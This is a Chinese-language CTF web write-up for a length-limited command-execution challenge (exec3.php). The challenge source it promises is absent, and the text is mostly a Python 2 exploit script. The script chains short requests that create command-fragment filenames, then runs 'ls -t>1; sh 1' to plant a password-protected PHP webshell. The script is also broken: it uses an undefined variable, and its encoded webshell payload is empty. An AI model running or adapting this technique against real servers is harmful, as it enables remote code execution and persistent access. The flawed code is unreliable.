[CTF_web]exec/exec3.php

---

CTF_web

CTF_web

---

源码如下 :

---

分析

这个challenge如果要写入一个 shell 的话
必须要要求当前目录有写权限
下面给出利用脚本

利用代码 :

#!/usr/bin/env python
# encoding: utf-8

import requests
import base64

url = "http://127.0.0.1/CTF_web/exec/exec3.php"
arg = "c"

def add_slashes(cmd):
    cmd = cmd.replace(".", "\\.")
    cmd = cmd.replace("\\", "\\\\")
    cmd = cmd.replace("/", "\\/")
    cmd = cmd.replace("|", "\\|")
    cmd = cmd.replace("&", "\\&")
    cmd = cmd.replace("-", "\\-")
    cmd = cmd.replace("<", "\\<")
    cmd = cmd.replace(">", "\\>")
    cmd = cmd.replace("#", "\\#")
    cmd = cmd.replace(" ", "\\ ")
    cmd = cmd.replace("=", "\\=")
    return cmd

def exec_cmd(cmd, max_length):
    print "[+] cmd : %s" % (cmd)
    cmd = add_slashes(cmd)
    print "[+] Full cmd : %s" % (cmd)
    if len(cmd) < max_length:
        return requests.get(url + "?" + c + "=" + cmd).text[:-1135 - 57]

    every_length = max_length - len(">") - len("\\\\")
    times = len(cmd) / every_length
    for i in range(1, times + 1, 1):
        index = i * every_length - 1
        if cmd[index] == "\\":
            cmd = cmd[0:index] + "\\" + cmd[index:]

    cmds = []
    for i in xrange(times):
        every = cmd[every_length * i:every_length * (i+1)]
        true_cmd = ">%s\\\\" % (every)
        cmds.append(true_cmd.replace("\\\\\\", "\\\\"))
    end_cmd = ">%s" % (cmd[times * every_length:])
    if len(end_cmd) == 1:
        cmds[-1] = cmds[-1][0:-2]
    cmds.append(end_cmd)
    for i in cmds[::-1]:
        target = url + "?" + arg + "=" + i
        print "[+] Sending : %s" % (target)
        requests.get(target)
    requests.get(url + "?" + arg + "=" + "ls -t>1")
    requests.get(url + "?" + arg + "=" + "sh 1")

exec_cmd("echo %s>6" % (base64.b64encode("")), 7)
exec_cmd("cat 6|base64 -d>c.php", 7)
print "[%s]" % ("-" * 64)
print "[+] Upload webshell successful!"
print "[+] Webshell is stored at : %s" % (url + "c.php")
print "[+] password : c"
print "[%s]" % ("-" * 64)